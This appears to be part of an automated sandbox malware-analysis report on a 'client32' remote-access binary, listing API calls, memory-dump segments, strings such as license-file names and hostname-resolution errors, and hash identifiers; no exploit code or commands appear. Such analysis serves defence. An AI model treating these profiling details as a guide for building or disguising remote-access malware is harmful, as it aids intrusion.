                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                        • CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 398584587-0
                                                                                                                        • Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                        • Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
                                                                                                                        • Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                        • Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2
                                                                                                                        APIs
                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2
                                                                                                                          • Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006
                                                                                                                        • _free.LIBCMT ref: 1100ECB4
                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                        • _free.LIBCMT ref: 1100ECC7
                                                                                                                        • _free.LIBCMT ref: 1100ECDA
                                                                                                                        • _free.LIBCMT ref: 1100ECED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3515823920-0
                                                                                                                        • Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                        • Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
                                                                                                                        • Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                        • Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                        • wsprintfA.USER32 ref: 11141FAE
                                                                                                                        • wsprintfA.USER32 ref: 11141FC4
                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                          • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                        • API String ID: 3779116287-2600120591
                                                                                                                        • Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                        • Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
                                                                                                                        • Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                        • Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile$CloseHandle
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 1443461169-123907689
                                                                                                                        • Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                        • Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
                                                                                                                        • Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                        • Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A9BF0: _strncpy.LIBCMT ref: 685A9C14
                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68596691
                                                                                                                        • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966A2
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966CD
                                                                                                                        Strings
                                                                                                                        • Cannot resolve hostname %s, error %d, xrefs: 685966D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                                                                                        • String ID: Cannot resolve hostname %s, error %d
                                                                                                                        • API String ID: 2603238076-1802540647
                                                                                                                        • Opcode ID: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
                                                                                                                        • Instruction ID: 8ee86666c36afe0e9ec017191a216632d1fe139ab56e6a3bb53b3a1890622fb9
                                                                                                                        • Opcode Fuzzy Hash: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
                                                                                                                        • Instruction Fuzzy Hash: DB219435A402189BDB10DA64DC50BAAB3F8BF98254F808599E919D7280EF31AD44CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,7E4636A2,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                        • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$Create$__wcstoi64_memsetwsprintf
                                                                                                                        • String ID: Client$DisableGeolocation
                                                                                                                        • API String ID: 2598271332-4166767992
                                                                                                                        • Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
                                                                                                                        • Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
                                                                                                                        • Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
                                                                                                                        • Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84
                                                                                                                        APIs
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                          • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,75C0A1D0,75BF3760,75BF7A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                          • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                        • TranslateMessage.USER32(?), ref: 11026E60
                                                                                                                        • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                                                        • API String ID: 3212272093-2210386016
                                                                                                                        • Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                        • Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
                                                                                                                        • Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                        • Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • _memset.LIBCMT ref: 1110C477
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess_memset
                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                        • API String ID: 1322847840-2664294811
                                                                                                                        • Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
                                                                                                                        • Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
                                                                                                                        • Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
                                                                                                                        • Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                          • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101755C
                                                                                                                          • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                          • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                          • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 11017472
                                                                                                                          • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                          • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                        • SetEvent.KERNEL32(000002F4), ref: 1101763D
                                                                                                                        • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                        Strings
                                                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
